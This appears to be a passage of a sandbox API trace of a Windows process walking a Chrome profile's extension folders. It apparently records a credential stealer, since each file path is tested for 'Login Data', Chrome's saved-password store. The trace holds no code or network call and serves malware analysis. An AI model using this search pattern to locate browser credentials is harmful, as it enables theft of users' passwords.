[0161.565] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.565] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.565] GetProcessHeap () returned 0x8e0000 [0161.565] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.565] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="it", cAlternateFileName="")) returned 1 [0161.565] lstrcmpiW (lpString1="it", lpString2=".") returned 1 [0161.565] lstrcmpiW (lpString1="it", lpString2="..") returned 1 [0161.565] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.565] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.565] lstrlenW (lpString="\\") returned 1 [0161.565] GetProcessHeap () returned 0x8e0000 [0161.565] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.565] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.565] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.565] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.565] lstrlenW (lpString="it") returned 2 [0161.565] GetProcessHeap () returned 0x8e0000 [0161.565] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.565] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.565] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it" [0161.565] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.565] GetProcessHeap () returned 0x8e0000 [0161.565] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.565] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it") returned 137 [0161.566] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it") returned 137 [0161.566] lstrlenW (lpString="\\*.*") returned 4 [0161.566] GetProcessHeap () returned 0x8e0000 [0161.566] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.566] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it" [0161.566] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\*.*" [0161.566] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.566] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.566] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.567] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.567] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.567] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a43460, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.567] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it") returned 137 [0161.567] lstrlenW (lpString="\\") returned 1 [0161.567] GetProcessHeap () returned 0x8e0000 [0161.567] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.567] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it" [0161.567] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\" [0161.567] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\") returned 138 [0161.567] lstrlenW (lpString="messages.json") returned 13 [0161.567] GetProcessHeap () returned 0x8e0000 [0161.567] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.567] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\" [0161.567] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" [0161.567] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.567] GetProcessHeap () returned 0x8e0000 [0161.567] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.567] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json", lpSrch="Login Data") returned 0x0 [0161.567] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.567] GetProcessHeap () returned 0x8e0000 [0161.567] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.567] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a43460, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.567] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.567] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.567] GetProcessHeap () returned 0x8e0000 [0161.567] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.567] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.567] GetProcessHeap () returned 0x8e0000 [0161.567] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.567] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="ja", cAlternateFileName="")) returned 1 [0161.567] lstrcmpiW (lpString1="ja", lpString2=".") returned 1 [0161.567] lstrcmpiW (lpString1="ja", lpString2="..") returned 1 [0161.568] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.568] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.568] lstrlenW (lpString="\\") returned 1 [0161.568] GetProcessHeap () returned 0x8e0000 [0161.568] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.568] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.568] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.568] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.568] lstrlenW (lpString="ja") returned 2 [0161.568] GetProcessHeap () returned 0x8e0000 [0161.568] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.568] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.568] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja" [0161.568] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.568] GetProcessHeap () returned 0x8e0000 [0161.568] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.568] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja") returned 137 [0161.568] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja") returned 137 [0161.568] lstrlenW (lpString="\\*.*") returned 4 [0161.568] GetProcessHeap () returned 0x8e0000 [0161.568] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.568] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja" [0161.568] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\*.*" [0161.568] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.568] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.568] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.569] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.569] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.569] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a43460, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.569] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja") returned 137 [0161.569] lstrlenW (lpString="\\") returned 1 [0161.569] GetProcessHeap () returned 0x8e0000 [0161.569] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.569] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja" [0161.569] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\" [0161.569] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\") returned 138 [0161.569] lstrlenW (lpString="messages.json") returned 13 [0161.569] GetProcessHeap () returned 0x8e0000 [0161.569] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.569] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\" [0161.569] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json") 